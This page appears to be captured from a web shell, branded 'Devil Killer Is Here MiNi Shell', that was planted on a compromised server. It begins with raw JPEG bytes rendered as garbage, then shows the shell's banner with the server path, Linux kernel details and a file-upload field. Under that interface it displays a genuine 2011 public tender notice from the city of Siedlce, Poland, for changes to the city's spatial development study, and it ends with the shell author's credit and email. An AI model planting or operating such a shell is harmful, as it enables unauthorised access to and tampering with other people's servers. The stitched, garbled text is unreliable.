JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110527/150561-N-2011.html

<p class="kh_header"><b>Siedlce: Sporządzenie zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce</b><br>
<b>Numer ogłoszenia: 150561 - 2011; data zamieszczenia: 27.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Siedlce , Skwer Niepodległości 2, 08-110 Siedlce, woj. mazowieckie, tel. 025 6430785, faks 025 6430718.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siedlce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie, zgodnie z obowiązującymi przepisami prawa, zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce - obszar ok. 620 ha,  dotyczącej terenów:  doliny rzeki Muchawki   i Helenki, obszaru położonego pomiędzy terenami PKP,  po północno-zachodniej stronie tych terenów oraz dla terenu  we wschodniej części dzielnicy Stara Wieś w rejonie cmentarza przy ul. Świętej Faustyny Kowalskiej, a także terenu położonego w rejonie ulicy Grabianowskiej, na południe od obwodnicy do granicy administracyjnej miasta. 

Opracowanie przedmiotowego dokumentu planistycznego powinno być w oparciu o regulacje ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym  (Dz. U. z 2003r. Nr 80, poz. 717 z późn. zm.). 
 	
Założeniami  do opracowania  zmiany Studium są:
-  naniesienie do dokumentu Studium realizowanej obwodnicy miasta (kierunek na pólnoc) ,
- otworzenia terenów rolniczych i leśnych położonych w dolinie rzeki Muchawki i Helenki oraz w rejonie ulicy Ganiewskiego na zabudowę mieszkaniową, 
- zmianę ustaleń Studium w stosunku do terenów, które wskazane są do wymogu przeprowadzenia scaleń i podziału nieruchomości.  

Zakresem zmiany studium będzie określenie nowych zasad kształtowania polityki przestrzennej miasta, w tym lokalnych zasad zagospodarowania przestrzennego oraz wzajemnych relacji między nimi z uwzględnieniem oddziaływania tej zmiany na otoczenie terenów objętych granicami opracowania oraz ujednolicenie treści z obowiązującym studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Siedlce.

Realizacja   zadania  będzie  składać  się  z niżej  wymienionych  części: 

1)	Część I - analiza danych wejściowych: 

a)	analiza stanu istniejącego w odniesieniu do obowiązującego studium oraz analiza wniosków złożonych do zmiany studium, wraz z propozycją ich uwzględnienia, przedstawiona w 1 egz. w formie opisowej i graficznej w skali 1:5000 oraz w 1 egz.  
w formie publikacji elektronicznej na płycie CD,  
b)	badanie podłoża gruntowego - opracowanie przedstawione w 1 egz. oraz w 1 egz.  
w formie publikacji elektronicznej na płycie CD,  
c)	analiza terenów nad rzekami i przyrodniczych - opracowanie przedstawione w 1 egz. oraz w 1 egz.  w formie publikacji elektronicznej na płycie CD,  
d)	opracowanie koncepcji projektu zmiany studium w skali 1:10000, uwzględniającej wyniki z dokonanych analiz  oraz uwzględniającej ustalenia planu zagospodarowania przestrzennego województwa, w 1 egz. oraz w 1 egz. w formie publikacji elektronicznej na płycie CD,  
e)	sporządzenie opracowania ekofizjograficznego dla obszarów zmiany studium w formie ujednoliconej z treścią obecnego opracowania oraz sporządzenie wyrysu z części graficznej dla obszarów objętych zmianą studium , w 2 egz.  oraz w 1 egz.  w formie publikacji elektronicznej na płycie CD,
f)	opracowanie  uzasadnień nieuwzględnienia  wniosków w projekcie zmiany studium 
w 1 egz.  oraz w 1 egz. w formie publikacji elektronicznej na płycie CD,  
g)	przekazanie materiałów planistycznych, określonych w pkt 1 lit. a), b), c), d), e), f)   Zamawiającemu i przedstawienie przez zespół autorski koncepcji zmiany studium na Kolegium Prezydenta Miasta.

2)	Część II - projektowanie: 

a)	opracowanie projektu zmiany studium w zakresie objętym zmianą, z uwzględnieniem oddziaływania tej zmiany na otoczenie terenów objętych granicami opracowania, zgodnie z przepisami rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz.U. Nr 118 poz. 1233). Projekt zmiany studium winien być opracowany  w ujednoliconej formie z treścią obowiązującego studium uwarunkowań i kierunków zagospodarowania przestrzennego, z wyróżnieniem zakresu projektowanej zmiany, składającej się z następujących części:
    - tekstowej określającej uwarunkowania, o których mowa w art. 10 ust. 1 ustawy 
o planowaniu i zagospodarowaniu przestrzennym oraz zawierającej ustalenia kierunków zagospodarowania przestrzennego miasta, o których mowa w art. 10 ust. 2 tej ustawy,
    - graficznej projektu zmiany studium przedstawiającej w/w uwarunkowania na mapie    w skali 1:5000, 
   - rysunku określającego kierunki zagospodarowania przestrzennego miasta, a także granic obszarów, o których mowa w art. 10 ust. 2 w/w ustawy, przedstawionego 
na   mapie  w skali 1:5000,
   - dokumentacji i schematów wyjaśniających, zawierających objaśnienia przyjętych rozwiązań oraz syntezę ustaleń studium, w  1 egz. oraz w 1 egz. w następującej formie publikacji elektronicznej na płycie CD:
 - przygotowanie projektu zmiany studium w wersji numerycznej w oprogramowaniu EWMAPA firmy GEOBID z Katowic,
    -  zapis tekstu zmiany studium w formie dokumentu  co najmniej WORD  2000,
b)   opracowanie prognozy oddziaływania na środowisko zmiany studium uwzględniającej wymagania zawarte w przepisach ustawy z dnia 03 października 2008r. 
o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa 
w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. nr 199 poz. 1227 z późn.zm.)  w 2 egz. oraz 1 egz.  w formie publikacji elektronicznej 
na płycie CD, 
 c) przekazanie materiałów określonych  w pkt. 2 lit. a), b)  Zamawiającemu 
i przedstawienie przez zespół autorski projektu zmiany studium na Kolegium Prezydenta Miasta.

3)	 część III - komisja urbanistyczno- architektoniczna:

a)	przedstawienie projektu zmiany studium na komisji urbanistyczno-                   architektonicznej,
b)	analiza uwag komisji i propozycje ich uwzględnienia,
c)	wprowadzenie do projektu zmiany studium, uwzględnionych przez Zamawiającego, korekt wynikających z uzyskanej opinii komisji,
d)	opracowanie uzasadnień nieuwzględnienia, w projekcie zmiany studium, uwag komisji urbanistyczno-architektonicznej,
e)	przekazanie materiałów, określonych w pkt 3 lit. b), c), d) w 1 egz. oraz w 1egz.                      w formie publikacji elektronicznej na płycie CD  Zamawiającemu.

4)	 część IV - uzgadnianie i opiniowanie:

a)	uczestniczenie w opiniowaniu i uzgadnianiu projektu zmiany studium z właściwymi organami, wymaganymi ustawą o planowaniu i zagospodarowaniu przestrzennym 
i innymi przepisami szczególnymi,
b)	wprowadzenie do projektu zmiany studium korekt wynikających z uzyskanych opinii 
i dokonanych uzgodnień, 
c)	opracowanie uzasadnień nieuwzględnienia, w projekcie  zmiany studium, uwag  organów opiniujących i uzgadniających, w 1 egz. oraz 1 egz. w formie publikacji elektronicznej na płycie CD, 
d)	przekazanie uzgodnionego projektu zmiany studium  w 1 egz. oraz w 1 egz. w formie publikacji elektronicznej na płycie CD, wraz z uzasadnieniem, o którym mowa w pkt 4 lit. c),  Zamawiającemu.

5)	część V - wyłożenie i dyskusja publiczna:

a)	uczestniczenie w dyżurze autorskim i dyskusji publicznej w czasie wyłożenia projektu zmiany studium do publicznego wglądu wraz z prognozą oddziaływania 
na  środowisko,
b)	opracowanie analizy uwag wniesionych do projektu zmiany studium wraz 
z propozycją ich uwzględnienia oraz uzasadnieniem nieuwzględnienia pozostałych 
i przekazanie jej Zamawiającemu,  w 1 egz.  oraz w 1 egz. w formie publikacji elektronicznej na płycie CD i uzyskanie akceptacji  Zamawiającego,
c)	wprowadzenie do projektu zmiany studium zmian wynikających z rozpatrzenia uwag,  
d)	uczestniczenie w ewentualnym ponowieniu uzgodnień w niezbędnym zakresie,
e)	wprowadzenie do projektu zmiany studium korekt wynikających z ponownych uzgodnień,
f)	przekazanie skorygowanego projektu zmiany studium Zamawiającemu w 1 egz. oraz 
w 1 egz. w formie publikacji elektronicznej na płycie CD. 

6)	część VI - uchwalenie:

a)	przedstawienie projektu zmiany studium na posiedzeniu Komisji Gospodarki Przestrzennej 
i Ochrony Środowiska oraz na Sesji Rady Miasta do uchwalenia wraz z załącznikami,
b)	wprowadzenie ewentualnych zmian do projektu zmiany studium wniesionych przez Radę Miasta Siedlce  i udział w czynnościach  ponowionych, w niezbędnym zakresie, procedury  planistycznej,
c)	przygotowanie uzasadnienia oraz podsumowania w zakresie wynikającym z art. 42 pkt. 2 oraz art. 55 ust.3 ustawy z dnia 03 października 2008r. o udostępnianiu informacji 
o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  (Dz.U. nr 199 poz. 1227 z późn. zm.),  w 1 egz. oraz 1 egz.  
w formie publikacji elektronicznej na płycie CD, 
d)	 udzielanie ewentualnych wyjaśnień Wojewodzie, któremu została przedstawiona  uchwała 
o uchwaleniu zmiany studium wraz z załącznikami, do ich oceny pod względem zgodności  z przepisami prawa,
e)	udostępnienie wersji numerycznej uchwalonego dokumentu w oprogramowaniu EWMAPA firmy GEOBID z Katowic,
f)	udział w czynnościach niezbędnych do ewentualnego doprowadzenia studium 
do zgodności z przepisami prawa, w sytuacji stwierdzenia nieważności uchwały w  sprawie studium, w tym udział w postępowaniu przed sądami administracyjnymi.

Przy realizacji zamówienia na sporządzenie zmiany studium uwarunkowań 
i kierunków zagospodarowania miasta Siedlce konieczne jest zastosowania 
co  najmniej wersji 8,0 oprogramowania EWMAPA firmy Geobid z Katowic  oraz edytora tekstu co najmniej Word 2000..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 17.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych (złożonego przez wykonawcę zgodnie z treścią załącznika nr 3 do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	  Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę (potwierdzoną dokumentem, że usługa ta została wykonana należycie) polegającą na opracowaniu Studium lub zmiany Studium terenu miasta o liczebności min. 50 tys. mieszkańców, a obszar opracowania powinien wynosić min. 300ha. Opracowanie  winno być wykonane na podstawie ustawy z dnia 27 marca 2003r. o planowaniu 
i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje narzędziami, wyposażeniem zakładu i urządzeniami technicznymi dostępnymi wykonawcy usług w celu realizacji zamówienia, tj.:
- wersją oprogramowania co najmniej  8,0  EWMAPA firmy GEOBID z Katowic,  edytorem tekstu co najmniej WORD 2000 oraz licencją na korzystanie z programu EWMAPA firmy GEOBID z Katowic.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje osobami, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne dla wykonania zamówienia, tj.: 

- 	osobą pełniącą funkcję głównego projektanta planu. Główny projektant musi wykazać się wykonaniem bądź wykonywaniem prac nad opracowaniem Studium lub zmiany Studium terenu miasta o liczebności min. 50 tys. mieszkańców w procedurze ustawy 
z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717,  z póź. zm.);
- 	co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń  w specjalności architektonicznej; 
- 	co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej; 
-	co najmniej jedną osobą posiadającą doświadczenie w pracy na programie EWMAPA.

Zamawiający dopuszcza połączenie wyżej wskazanych funkcji, pod warunkiem spełniania przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych (złożonego przez wykonawcę zgodnie z treścią załącznika nr 3 do siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siedlce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Referat Zamówień Publicznych Urzędu Miasta Siedlce, 08-110 Siedlce, Skwer Niepodległości 2,  pok. nr 3, (cena: 3,60 zł brutto + koszt przesyłki)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2011 godzina 09:45, miejsce: Kancelaria Ogólna Urzędu Miasta Siedlce, pokój Nr 30, Skwer  Niepodległości 2,  08-110 Siedlce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com